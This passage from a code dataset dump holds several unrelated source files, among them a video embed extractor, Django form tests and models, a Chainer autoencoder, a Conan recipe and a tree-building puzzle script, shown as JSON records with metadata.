\"test\"\n assert releases[count - 1].tag_name == \"0.1.0\"\n assert releases[count - 1].body == \"testing release\"\n","sub_path":"tests/integration/test_gitlab.py","file_name":"test_gitlab.py","file_ext":"py","file_size_in_byte":6017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"317245171","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndir_paths = [\"model_normal_tremor\", \"model_limits_normal\", \"model_weakness_normal\"]\nfilename = \"monitor.csv\"\nplt.figure()\nfor dir_path in dir_paths:\n print(dir_path)\n reward_arr = [];\n mean_arr = []\n count = 0\n with open(dir_path + \"/\" + filename, 'r') as 
fin:\n        line = fin.readline()\n        while line:\n            values = line.split(\",\")\n            print(values)\n            if count >= 2:\n                if(dir_path == dir_paths[1]):\n                    if count % 2 != 0:\n                        reward_arr.append(float(values[0]))\n                        mean_arr.append(np.mean(reward_arr[-50:]))\n                else:\n                    reward_arr.append(float(values[0]))\n                    mean_arr.append(np.mean(reward_arr[-50:]))\n            line = fin.readline()\n            count += 1\n    plt.plot(mean_arr, label=dir_path)\nplt.legend()\nplt.show()\n","sub_path":"icra2021/base/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"316404966","text":"# Port\nSERVER_PORT = '9000'\n# Enable debug mode\nDEBUG = True\n# Echo SQL statements\nSQLALCHEMY_ECHO = True\n\nSQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:123456@127.0.0.1:3306/movie'\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n\n# Database encoding utf-8\nSQLALCHEMY_ENCODING = \"utf-8\"\n","sub_path":"order/config/local_setting.py","file_name":"local_setting.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42526367","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom ..util.html import get_content, get_location\nfrom ..util.match import matchall, match1\nfrom ..embedextractor import EmbedExtractor\n\nimport json\n\n\"\"\"\nrefer to http://open.youku.com/tools\n\"\"\"\nyouku_embed_patterns = [ 'youku\\\\.com/v_show/id_([a-zA-Z0-9=]+)',\n                         'player\\\\.youku\\\\.com/player\\\\.php/sid/([a-zA-Z0-9=]+)/v\\\\.swf',\n                         'loader\\\\.swf\\\\?VideoIDS=([a-zA-Z0-9=]+)',\n                         'player\\\\.youku\\\\.com/embed/([a-zA-Z0-9=]+)',\n                         'YKU.Player\\\\(\\\\'[a-zA-Z0-9]+\\\\',{ client_id: \\\\'[a-zA-Z0-9]+\\\\', vid: \\\\'([a-zA-Z0-9]+)\\\\'',\n                         'data-youku=\\\\\"[a-zA-Z0-9,:]+vid:([a-zA-Z0-9=]+)\\\\\"'\n                         ]\n\n\"\"\"\nv.qq.com\n\"\"\"\nqq_embed_patterns = [ 'v\\\\.qq\\\\.com[a-zA-Z0-9\\\\/\\\\?\\\\.\\\\;]+vid=([a-zA-Z0-9]+)',\n                      'TPout\\\\.swf[a-zA-Z0-9=\\\\?\\\\&_]+vid=([a-zA-Z0-9]+)'\n                      ]\n\n\n\"\"\"\ntv.sohu.com\n\"\"\"\nsohu_embed_patterns = [ 'tv\\\\.sohu\\\\.com[a-zA-Z0-9\\\\/\\\\?=]+\\\\&vid=([a-zA-Z0-9]+)\\\\&',\n                        'share\\\\.vrs\\\\.sohu\\\\.com\\\\/my\\\\/v.swf[&+=a-zA-z0-9]+&id=([^&]+)',\n                        'my\\\\.tv\\\\.sohu\\\\.com\\\\/[a-zA-Z0-9\\\\/]+/([^\\\\.]+)'\n                        ]\n\n\"\"\"\nKu6\n\"\"\"\nku6_embed_url = [ '(http://v.ku6vms.com/[^\\\\\"]+)'\n                  ]\n\nku6_embed_patterns = [ 'http://player.ku6.com/refer/(.*)/v.swf'\n                       ]\n\"\"\"\n163\n\"\"\"\nnetease_embed_patterns = [ 'v\\\\.163\\\\.com\\\\/[0-9a-zA-Z\\\\/\\\\?\\\\.]+topicid=([^&]+)&\\\\;vid=([^&]+)',\n                           'topicid=([a-zA-Z0-9]+)&vid=([a-zA-Z0-9]+)&'\n                           ]\n\n\"\"\"\niqiyi\n\"\"\"\niqiyi_embed_patterns = [ 'definitionID=([^&]+)&tvId=([^&]+)'\n                         ]\n\n\"\"\"\nLetv Cloud\n\"\"\"\nlecloud_embed_patterns = [ '{\"uu\":\"([^\\\\\"]+)\",\"vu\":\"([^\\\\\"]+)\"',\n                           'bcloud.swf\\\\?uu=([^&]+)&vu=([^&]+)',\n                           'uu=([^&]+)&vu=([^&]+)'\n                           ]\n\n\"\"\"\nifeng\n\"\"\"\nifeng_embed_patterns = [ 'v\\\\.ifeng\\\\.com\\\\/[a-zA-Z\\\\=\\\\/\\\\?\\\\&\\\\.]+guid=([^\\\\\"]+)'\n                         ]\n\n\"\"\"\nweibo\n\"\"\"\nweibo_embed_patterns = [ 'http://video.weibo.com/player/1034:(\\\\w{32})\\\\w*'\n                         ]\n\n\"\"\"\nSina\n\"\"\"\nsina_embed_patterns = [ 'http://video.sina.com.cn/share/video/(\\\\d+).swf'\n                        ]\n\n\"\"\"\nDilidili\n\"\"\"\ndilidili_embed_patterns = [ 'vid=([^&]+)&v=([^&]+)&'\n                            ]\n\n\"\"\"\nBilibili\n\"\"\"\nbilibili_embed_patterns = [ 'flashvars=\"aid=(\\\\d+)'\n                            ]\n\nclass GeneralEmbed(EmbedExtractor):\n    name = u\"GeneralEmbed (通用嵌入视频)\"\n\n    def prepare_playlist(self):\n        content = get_content(self.url)\n\n        vids = matchall(content, youku_embed_patterns)\n        for vid in vids:\n            
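# every match becomes a (site, vid) pair on video_info_list; the EmbedExtractor parsers listed at the bottom resolve them afterwards\n            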
self.video_info_list.append(('youku',vid))\n\n vids = matchall(content, qq_embed_patterns)\n for vid in vids:\n self.video_info_list.append(('qq.video',vid))\n\n vids = matchall(content, sohu_embed_patterns)\n for vid in vids:\n self.video_info_list.append(('sohu.my',vid))\n\n urls = matchall(content, ku6_embed_url)\n for url in urls:\n html = get_content(url)\n flashvars = matchall(html, ['vid=([^&]+)', 'style=([^&]+)', 'sn=([^&]+)'])\n data = json.loads(get_content('http://v.ku6vms.com/phpvms/player/forplayer/vid/{}/style/{}/sn/{}'.format(flashvars[0], flashvars[1],flashvars[2])))\n vid = data['ku6vid']\n self.video_info_list.append(('ku6',vid))\n vids = matchall(content, ku6_embed_patterns)\n for v in vids:\n self.video_info_list.append(('ku6', v))\n vids = matchall(content, netease_embed_patterns)\n for v in vids:\n self.video_info_list.append(('netease.video', v))\n\n vids = matchall(content, iqiyi_embed_patterns)\n for v in vids:\n videoid, tvid = v\n self.video_info_list.append(('iqiyi', (tvid, videoid)))\n\n vids = matchall(content, lecloud_embed_patterns)\n for v in vids:\n uu, vu = v\n self.video_info_list.append(('le.letvcloud', (vu, uu)))\n\n vids = matchall(content, ifeng_embed_patterns)\n for v in vids:\n v = v.split('&')[0]\n self.video_info_list.append(('ifeng.news', v))\n\n vids = matchall(content, weibo_embed_patterns)\n for v in vids:\n self.video_info_list.append(('weibo','http://weibo.com/p/' + v))\n\n vids = matchall(content, sina_embed_patterns)\n for v in vids:\n v = v.split('&')[0]\n self.video_info_list.append(('sina.video', v))\n\n vids = matchall(content, bilibili_embed_patterns)\n for v in vids:\n v = \"http://www.bilibili.com/video/av{}\".format(v)\n self.video_info_list.append(('bilibili.video', v))\n\n\n vids = matchall(content, dilidili_embed_patterns)\n for v in vids:\n v,site = v\n if site == 'bilibili':\n site = 'bilibili.video'\n elif site == 'qq':\n site = 'qq.video'\n elif site =='yun':\n site = 'le.letvcloud'\n v = v.split(':')\n self.video_info_list.append((site, v))\n\n tmp = []\n for v in self.video_info_list:\n if not v in tmp:\n tmp.append(v)\n self.video_info_list = tmp\n\n parser = EmbedExtractor.parser_list\n\nsite = GeneralEmbed()\n","sub_path":"ykdl/extractors/generalembed.py","file_name":"generalembed.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"49475905","text":"import datetime as dt\nfrom django.test import TestCase\n\nfrom classes.forms import ClassForm, LineOfBusinessForm, REQUIRED_ERROR\nfrom classes.models import Class, LineOfBusiness\n\n\nclass ClassFormTest(TestCase):\n\n def test_class_form_has_correct_prefix(self):\n form = ClassForm()\n self.assertEqual(form.prefix, 'class')\n\n def test_start_date_input_has_placeholder_and_css_classes(self):\n form = ClassForm()\n self.assertIn(\n 'placeholder=\"Select or enter the start date\"',\n form.as_p()\n )\n self.assertIn('class=\"form-control datepicker\"', form.as_p())\n\n def test_line_of_business_input_has_placeholder_and_css_classes(self):\n form = ClassForm()\n self.assertIn(\n 'placeholder=\"Select a Line Of Business (LOB)\"',\n form.as_p()\n )\n self.assertIn('class=\"form-control dropdown\"', form.as_p())\n\n def test_shift_input_has_placeholder_and_css_classes(self):\n form = ClassForm()\n self.assertIn(\n 'placeholder=\"Class shift\"',\n form.as_p()\n )\n self.assertIn('class=\"form-control\"', form.as_p())\n\n def 
test_hiring_bonus_input_has_placeholder_and_css_classes(self):\n form = ClassForm()\n self.assertIn(\n 'placeholder=\"Enter Hiring Bonus (in USD)\"',\n form.as_p()\n )\n self.assertIn('class=\"form-control\"', form.as_p())\n\n def test_referral_bonus_input_has_placeholder_and_css_classes(self):\n form = ClassForm()\n self.assertIn(\n 'placeholder=\"Enter Referral Bonus (in USD)\"',\n form.as_p()\n )\n self.assertIn('class=\"form-control\"', form.as_p())\n\n def test_start_date_input_validation_for_blank_entries(self):\n lob = LineOfBusiness.objects.create(name='PyPi')\n form = ClassForm(data={\n 'start_date': '',\n 'line_of_business': lob,\n 'shift': 1,\n 'hiring_bonus': 100,\n 'referral_bonus': 100,\n })\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors['start_date'],\n [REQUIRED_ERROR]\n )\n\n def test_line_of_business_input_validation_for_blank_entries(self):\n form = ClassForm(data={\n 'start_date': dt.date(2017, 7, 2),\n 'line_of_business': '',\n 'shift': 1,\n 'hiring_bonus': 100,\n 'referral_bonus': 100,\n })\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors['line_of_business'],\n [REQUIRED_ERROR]\n )\n\n def test_hiring_bonus_input_validation_for_blank_entries(self):\n lob = LineOfBusiness.objects.create(name='PyPi')\n form = ClassForm(data={\n 'start_date': dt.date(2017, 7, 2),\n 'line_of_business': lob,\n 'shift': 1,\n 'hiring_bonus': '',\n 'referral_bonus': 100,\n })\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors['hiring_bonus'],\n [REQUIRED_ERROR]\n )\n\n def test_referral_bonus_input_validation_for_blank_entries(self):\n lob = LineOfBusiness.objects.create(name='PyPi')\n form = ClassForm(data={\n 'start_date': dt.date(2017, 7, 2),\n 'line_of_business': lob,\n 'shift': 1,\n 'hiring_bonus': 100,\n 'referral_bonus': '',\n })\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors['referral_bonus'],\n [REQUIRED_ERROR]\n )\n\n def test_form_save(self):\n lob = LineOfBusiness.objects.create(name='iPython')\n form = ClassForm(data={\n 'start_date': ['06/20/2017'],\n 'line_of_business': lob,\n 'shift': 1,\n 'hiring_bonus': 150,\n 'referral_bonus': 300,\n })\n if not form.is_valid():\n print(form.errors)\n # self.assertTrue(form.is_valid())\n new_class = form.save()\n self.assertEqual(new_class, Class.objects.all()[0])\n\n\nclass LineOfBusinessFormTest(TestCase):\n\n def test_name_input_has_correct_placeholder(self):\n form = LineOfBusinessForm()\n self.assertIn(\n 'placeholder=\"Enter Line Of Business short name\"',\n form.as_p()\n )\n \n def test_name_input_has_correct_class(self):\n form = LineOfBusinessForm()\n self.assertIn(\n 'class=\"form-control col-sm-5\"',\n form.as_p()\n )","sub_path":"classes/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":4556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"212730474","text":"import chainer, numpy\nfrom matplotlib import pyplot\n\nclass mychain(chainer.Chain):\n def __init__(self, i, l, o):\n super(mychain, self).__init__()\n with self.init_scope():\n self.l1 = chainer.links.Linear(i,l)\n self.l2 = chainer.links.Linear(l,o)\n \n def __call__(self, x, y=None, train=True):\n x, y = chainer.Variable(x), chainer.Variable(y)\n\n a = chainer.functions.relu(self.l1(x))\n b = chainer.functions.relu(self.l2(a))\n if train:\n return chainer.functions.mean_squared_error(b, y)\n else:\n return b.data\n\ndef main():\n mnist = chainer.datasets.get_mnist()\n train, test = mnist\n\n model 
= mychain(28*28, 28*28*4, 28*28)\n\n    opt = chainer.optimizers.Adam()\n    opt.setup(model)\n\n    epoch = 500\n    batch = 20\n\n    #train 1 \n    def rand_train(a):\n        return a[numpy.random.randint(len(a))][0].reshape(-1,len(a[0][0]))\n\n    import time\n\n    t0 = time.time()\n\n    for i in range(epoch):\n        loss = 0\n        for n in range(batch):\n            pix = rand_train(train)\n            loss += model(pix, pix)\n        print('epoch: {}, loss: {}'.format(i, loss.data))\n\n        model.cleargrads()\n        loss.backward()\n        opt.update()\n    \n    #print-out train time\n    t1 = time.time()\n    print(t1-t0)\n\n    #save for train 1\n    try:\n        chainer.serializers.save_npz('mymodel.npz', model)\n    except:\n        print('save error')\n    \n    # result for train 1\n    pix = train[0][0].reshape(-1,len(train[0][0]))\n    #or train[0][0][:, numpy.newaxis].T\n    res = model(pix, train=False)\n\n    pyplot.imshow(\n        numpy.reshape(train[0][0], (28, 28)),\n        cmap='gray')\n    pyplot.show()\n    pyplot.imshow(numpy.reshape(res, (28, 28)), cmap='gray')\n    pyplot.show()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"152407004","text":"import random\nfrom race import races, Race\nfrom charclass import classes, CharacterClass\nfrom armor import armors, Armor\nfrom weapon import weapons, Weapon\nimport binascii\n\n_character_id = 0\nclass Character(object):\n\tfields = 'name:str race_name:str class_name:str var_str:int var_dex:int var_con:int var_int:int armor:armor weapon:weapon'\n\tdef __init__(self, name, race_name, class_name, str = 0, dex = 0, con = 0, int = 0, armor = None, weapon = None):\n\t\tself.name = name\n\n\t\tself.race_name = race_name\n\t\tself.class_name = class_name\n\n\t\tself.var_str = str\n\t\tself.var_dex = dex\n\t\tself.var_con = con\n\t\tself.var_int = int\n\n\t\tself.per_wc_miss_chance = {}\n\n\t\tself.armor = armor\n\t\tself.weapon = weapon\n\n\trace = property(lambda self: races[self.race_name])\n\tclass_ = property(lambda self: classes[self.class_name])\n\n\tstr = property(lambda self: 1 + self.race.base_str + self.var_str)\n\tdex = property(lambda self: 1 + self.race.base_dex + self.var_dex)\n\tcon = property(lambda self: 1 + self.race.base_con + self.var_con)\n\tint = property(lambda self: 1 + self.race.base_int + self.var_int)\n\n\tmax_hp = property(lambda self: self.con * self.class_.hp_per_con)\n\tmax_sp = property(lambda self: self.int)\n\tmax_mp = property(lambda self: self.dex)\n\n\t@classmethod\n\tdef random(cls):\n\t\tglobal _character_id\n\t\tname = 'character%d' % _character_id\n\t\t_character_id += 1\n\t\trace_name = random.choice(races.keys())\n\t\tclass_name = random.choice(classes.keys())\n\t\trndstats = [random.choice(['dex', 'con', 'int', 'str']) for i in range(random.randrange(4, 6+1))]\n\t\tstr = rndstats.count('str')\n\t\tdex = rndstats.count('dex')\n\t\tcon = rndstats.count('con')\n\t\tint = rndstats.count('int')\n\t\tarmor = random.choice(armors.values())#Armor.random()\n\t\tweapon = random.choice(weapons.values())#Weapon.random()\n\t\treturn cls(name, race_name, class_name, str, dex, con, int, armor, weapon)\n\n","sub_path":"src/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"463933037","text":"import os\nimport sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../varity')))\nsys.path.insert(0, 
os.path.abspath(os.path.join(os.path.dirname(__file__), '../varity/common')))\n\nimport varity\nimport cfg\nimport random\nimport shutil\nimport socket\nimport json\n\ndef configure():\n cfg.MAX_EXPRESSION_SIZE = 5\n cfg.MAX_NESTING_LEVELS = 3\n cfg.MAX_LINES_IN_BLOCK = 3\n cfg.ARRAY_SIZE = 10\n cfg.MAX_SAME_LEVEL_BLOCKS = 2\n cfg.MATH_FUNC_ALLOWED = True\n cfg.NUM_GROUPS = 1\n cfg.TESTS_PER_GROUP = 5\n cfg.OPT_LEVELS = [(\"-O0\", 1), (\"-O0\", 0), (\"-O1\", 0), (\"-O2\", 0), (\"-O3\", 0)]\n cfg.TESTS_DIR = \"_tests\"\n cfg.INPUT_SAMPLES_PER_RUN = 5\n cfg.REAL_TYPE = \"double\"\n\n # Set machine C compiler\n cc_path = findCCompiler()\n cfg.COMPILERS = [(\"cc\", cc_path)]\n\ndef findCCompiler():\n cc_path = shutil.which('cc')\n assert cc_path != None\n #print('cc:', cc_path)\n return cc_path\n\ndef test_driver():\n configure()\n varity.generateTests()\n print('dir:', varity.dirName())\n # Directory is generated\n assert os.path.exists(\"./\"+varity.dirName())\n\n # Check C files are generated\n c_files = 0\n for dirpath, dirnames, filenames in os.walk(\".\"):\n for filename in [f for f in filenames if f.endswith(\".c\")]:\n c_files = c_files + 1\n assert c_files == cfg.TESTS_PER_GROUP*cfg.NUM_GROUPS\n\n # Check C files are compiled\n varity.compileTests(\"./\"+varity.dirName())\n compiled_files = 0\n for dirpath, dirnames, filenames in os.walk(\".\"):\n for filename in [f for f in filenames if f.endswith(\".exe\")]:\n compiled_files = compiled_files + 1\n assert compiled_files > cfg.TESTS_PER_GROUP*cfg.NUM_GROUPS\n\n # Check executables can be run\n cwd = os.getcwd()\n varity.runTests(\"./\"+varity.dirName())\n resultsFile = cwd + \"/\" + varity.dirName() + \"/results.json\"\n with open(resultsFile) as json_file:\n data = json.load(json_file)\n testName = list(data.keys())[0]\n assert testName.endswith(\".c\")\n\n # Remove dir\n shutil.rmtree(cwd + \"/\" + varity.dirName())\n assert not os.path.exists(\"./\"+varity.dirName())\n\nif __name__ == '__main__':\n test_driver()\n\n","sub_path":"tests/test_driver.py","file_name":"test_driver.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"84627440","text":"from django.db import models\nfrom django.core.exceptions import ValidationError\n\nfrom edc.audit.audit_trail import AuditTrail\nfrom edc.choices import YES_NO, YES_NO_DONT_KNOW\nfrom edc.device.dispatch.models import BaseDispatchSyncUuidModel\n\nfrom apps.bcpp_household.managers import HouseholdAssessmentManager\nfrom apps.bcpp_household.exceptions import AlreadyReplaced\n\nfrom ..choices import INELIGIBLE_REASON, RESIDENT_LAST_SEEN\n\nfrom .household_structure import HouseholdStructure\nfrom .plot import Plot\n\n\nclass HouseholdAssessment(BaseDispatchSyncUuidModel):\n\n household_structure = models.OneToOneField(HouseholdStructure)\n\n residency = models.CharField(\n verbose_name=('Does anyone ever stay in this household?'),\n choices=YES_NO,\n max_length=25,\n null=True,\n editable=True,\n )\n\n member_count = models.IntegerField(\n verbose_name=(\"How many people live in this household (estimate)?\"),\n null=True,\n blank=True,\n help_text=(\"Provide the number of members in this household.\"))\n\n eligibles = models.CharField(\n verbose_name=('In speaking with the individual(s) above, at '\n 'least one member of this plot is potentially eligible'),\n choices=YES_NO_DONT_KNOW,\n max_length=25,\n null=True,\n blank=True,\n editable=True,\n )\n\n ineligible_reason = models.CharField(\n 
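# the recorded reason is constrained to the INELIGIBLE_REASON choices below rather than free text\n        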
verbose_name=('If no members are eligible for this study, please state '\n                      'the reason for ineligibility.'),\n        null=True,\n        max_length=25,\n        choices=INELIGIBLE_REASON,\n        editable=True,\n        blank=True)\n\n    last_seen_home = models.CharField(\n        verbose_name=('When was a resident last seen in this household?'),\n        choices=RESIDENT_LAST_SEEN,\n        max_length=25,\n        null=True,\n        blank=True,\n        editable=True,\n    )\n\n    def __unicode__(self):\n        return unicode(self.household_structure)\n\n    objects = HouseholdAssessmentManager()\n\n    history = AuditTrail()\n\n    def save(self, *args, **kwargs):\n        if self.household_structure.household.replaced_by:\n            raise AlreadyReplaced('Model {0}-{1} has its container replaced.'.format(\n                self._meta.object_name, self.pk))\n        if self.household_structure.enumerated:\n            raise ValidationError('HouseholdStructure has been enumerated')\n        if self.household_structure.failed_enumeration_attempts < 3:\n            raise ValidationError('Three attempts are required before Household Assessment')\n        super(HouseholdAssessment, self).save(*args, **kwargs)\n\n    def natural_key(self):\n        return self.household_structure.natural_key()\n    natural_key.dependencies = ['bcpp_household.household_structure']\n\n    def dispatch_container_lookup(self, using=None):\n        return (Plot, 'household_structure__household__plot__plot_identifier')\n\n    @property\n    def vdc_househould_status(self):\n        return self.last_seen_home\n\n    class Meta:\n        app_label = 'bcpp_household'\n        verbose_name = 'Household Residency Status Assess'\n        verbose_name_plural = 'Household Residency Status Assess'\n","sub_path":"apps/bcpp_household/models/household_assessment.py","file_name":"household_assessment.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"350199694","text":"import os\nimport functools\nfrom conans import ConanFile, CMake, tools\n\nrequired_conan_version = \">=1.33.0\"\n\n\nclass InnoextractConan(ConanFile):\n    name = \"innoextract\"\n    description = \"Extract contents of Inno Setup installers\"\n    license = \"innoextract License\"\n    topics = (\"inno-setup\", \"decompression\")\n    homepage = \"https://constexpr.org/innoextract/\"\n    url = \"https://github.com/conan-io/conan-center-index\"\n    exports_sources = [\"CMakeLists.txt\", \"patches/*\"]\n    requires = (\n        \"boost/1.78.0\",\n        \"xz_utils/5.2.5\",\n        \"libiconv/1.16\"\n    )\n    generators = \"cmake\", \"cmake_find_package\"\n    settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n\n    @property\n    def _source_subfolder(self):\n        return \"source_subfolder\"\n\n    @property\n    def _build_subfolder(self):\n        return \"build_subfolder\"\n\n    def source(self):\n        tools.get(**self.conan_data[\"sources\"][self.version], strip_root=True,\n                  destination=self._source_subfolder)\n\n    def build(self):\n        for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n            tools.patch(**patch)\n        os.remove(os.path.join(self._source_subfolder, 'cmake', 'FindLZMA.cmake'))\n        os.remove(os.path.join(self._source_subfolder, 'cmake', 'Findiconv.cmake'))\n        cmake = self._configure_cmake()\n        cmake.build()\n\n    @functools.lru_cache(1)\n    def _configure_cmake(self):\n        cmake = CMake(self)\n        # Turn off static library detection, which is on by default on Windows.\n        # This keeps the CMakeLists.txt from trying to detect static Boost\n        # libraries and use Boost components for zlib and BZip2. 
Getting the\n # libraries via Conan does the correct thing without other assistance.\n cmake.definitions[\"USE_STATIC_LIBS\"] = False\n cmake.configure(build_folder=self._build_subfolder)\n return cmake\n\n def package(self):\n self.copy(\"LICENSE\", dst=\"licenses\", src=self._source_subfolder)\n cmake = self._configure_cmake()\n cmake.install()\n tools.rmdir(os.path.join(self.package_folder, \"share\"))\n\n def package_id(self):\n del self.info.settings.compiler\n self.info.requires.clear()\n\n def package_info(self):\n self.cpp_info.libdirs = []\n bindir = os.path.join(self.package_folder, \"bin\")\n self.output.info(\"Appending PATH environment variable: {}\"\n .format(bindir))\n self.env_info.PATH.append(bindir)\n","sub_path":"recipes/innoextract/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"438877414","text":"#######Implementation of totogram.py#################\n####Step1:Find the total number of nodes for the given height,function num_nodes() is implemented to compute this#######\n####step2:call on function medians() to compute median and it creates a list which as all the medians#########\n####step3:function leveltree() is called to build a balanced binary tree with an exception at level two which has three nodes####\n####step4:diff() is called to find the maximum difference in built tree########\n####step5:loop is constructed which call the function optimize() to reorders the tree to reduce the maximum difference found so far####\n####step6:loop terminates if no more optimization could be made with the tree constructed#######\n####Result Analysis######\n####k=3 solution obtained 3####\n####k=4 solution obtained 5####\n####k=5 solution obtained 11####\n####k=6 solution obtained 23####\n####k=7 solution obtained 47####\n###################End################################# \nimport statistics\nimport sys\nh=int(sys.argv[1])\nmaximum=0\nclass Tree(object): ######tree nodes are of class type TREE######\n\tdef __init__(self,data):\n\t\tself.left = None\n\t\tself.right = None\n\t\tself.middle=None\n\t\tself.data = data\ndef num_nodes(h): ####### Function to return number of nodes for given height######\n\tsum=0\n\tpnode=0\n\tfor i in range(1,h+1):\n\t\tif i ==1:\n\t\t\tsum=1\n\t\telif i==2:\n\t\t\tsum+=3\n\t\t\tpnode=3\n\t\telse:\n\t\t\tsum=sum+(pnode*2)\n\t\t\tpnode=pnode*2\n\treturn sum\ntemp={}\nqueue=[]\ntnode=Tree(0)\ndef chunks(l, n):#######find the element for each level of tree######\n\tn = max(1, n)\n\treturn [l[i:i + n] for i in range(0, len(l), n)]\ndef medians(mylist,num):\n\ttemp=chunks(mylist,int(len(mylist)/num))\n\tfor i in range(0,num):\n\t\tmedian=int(statistics.median(temp[i]))\n\t\tqueue.append(median)\n\t\tmylist.remove(median)\nnode=Tree(0)\ndef leveltree(node):\n\tfor i in range (1,h+1):\n\t\tif i==1:\n\t\t\ttemp=queue[0:1]\n\t\t\tnode=maketree(node,temp,i,0)\n\t\t\tn=1\n\t\telif i==2:\n\t\t\ttemp=queue[n:n+3]\n\t\t\tmaketree(node,temp,i,0)\n\t\t\tn=n+3\n\t\t\tp=3\n\t\telse:\n\t\t\ttemp=queue[n:n+p*2]\n\t\t\tmaketree(node,temp,i,0)\n\t\t\tn=n+p*2\n\t\t\tp=p*2\n\treturn node\ndef maketree(self,temp,i,bool):######builds a level balanced binary tree with 3 nodes in second level and two nodes each###### \n\tbool=bool+1\n\tif i==1:\n\t\tself=Tree(0)\n\t\tself.data=temp.pop(0)\n\t\treturn self\n\telse 
:\n\t\tself.left=maketree(self.left,temp,i-1,bool)\n\t\tif(bool==1):\n\t\t\tself.middle=maketree(self.middle,temp,i-1,bool)\n\t\tself.right=maketree(self.right,temp,i-1,bool)\n\t\treturn self\n\na=[]\t\t\ndef lprintTree(tree,bool):######prints the tree in level based order on finding the result######\n\t\tif tree==None:\n\t\t\treturn\n\t\tif bool==1:\n\t\t\ta.append(tree.data)\n\t\tif tree != None:\n\t\t\tlprintTree(tree.left,bool-1)\n\t\t\tif tree.middle != None:\n\t\t\t\tlprintTree(tree.middle,bool-1)\n\t\t\tlprintTree(tree.right,bool-1)\ndef diff(self,i,bool):######Function to find the difference#######\n\tglobal maximum\n\tglobal tnode\n\tbool=bool+1\n\tif self.left == None and self.right ==None:\n\t\treturn self\n\telse :\n\t\tl=self.left.data\n\t\tself.left=diff(self.left,i-1,bool)\n\t\tif(bool==1):\n\t\t\tself.middle=diff(self.middle,i-1,bool)\n\t\tr=self.right.data\n\t\tself.right=diff(self.right,i-1,bool)\n\t\tdifference=max(abs(self.data-l),abs(self.data-r))\n\t\tif maximum < difference:\n\t\t\tif( self != None):\n\t\t\t\ttnode=self\n\t\t\t\tmaximum=difference\n\treturn self\t\nmini=999\t\nmp=Tree(0)\ndef min(tnode,parent):######Helper function to reorder the tree,returns the address of parent node having child with minimum value#######\n\tglobal mini\n\tglobal mp\n\tif(tnode==None):\n\t\treturn\n\tif(mini>tnode.data):\n\t\tmini=tnode.data\n\t\tmp=parent\n\tmin(tnode.left,tnode)\n\tmin(tnode.right,tnode)\n\treturn mp\nmx=-999\t\ndef maxi(tnode,parent):######Helper function to reorder the tree, returns the address of parent node having child with maximum value######\n\tglobal mx\n\tglobal mp\n\tif(tnode==None):\n\t\treturn\n\tif(mx<tnode.data):\n\t\tmx=tnode.data\n\t\tmp=parent\n\tmaxi(tnode.left,tnode)\n\tmaxi(tnode.right,tnode)\n\treturn mp\ndef optimize(node):######reorders the tree as described in step 5 of the header,swapping the children of the min and max parents to reduce the maximum difference######\n\tglobal mini\n\tglobal mx\n\tmini=999\n\tmx=-999\n\ttnode=min(node,node)\n\ttemp=maxi(node,node)\n\tif(tnode!=None and temp!=None):\n\t\tif(temp.left.data>temp.data):\n\t\t\tt=tnode.left.data\n\t\t\ttnode.left.data=temp.left.data\n\t\t\ttemp.left.data=t\n\t\tif(temp.right.data>temp.data):\n\t\t\tt=tnode.left.data\n\t\t\ttnode.left.data=temp.right.data\n\t\t\ttemp.right.data=t\t\nmylist=[i for i in range(1,num_nodes(h)+1)]\nfor height in range(0,h):########call to build the initial tree######\n\tif height==0:\n\t\tmedians(mylist,1)\n\telif height==1:\n\t\tmedians(mylist,3)\n\t\tparent=3\n\telif height >1:\n\t\tmedians(mylist,parent*2)\n\t\tparent=parent*2\nnode=leveltree(node)\ns=diff(node,h,0)\nmaximum1=999\nwhile(maximum<maximum1):\n\toptimize(node)\n\tif(maximum1>maximum):\n\t\tmaximum1=maximum\n\t\ta=list()\n\t\tfor i in range(1,h+1):\n\t\t\tlprintTree(node,i)\n\tmaximum=0\t\n\tdiff(node,h,0)\t\nprint(maximum)#######returns our result i.e maximum of all the differences in the tree#######\nprint(a)######returns the level based order of the tree#######\n\n ","sub_path":"totogram.py","file_name":"totogram.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"45946697","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.stats import norm\nimport math\nimport matplotlib.colors as 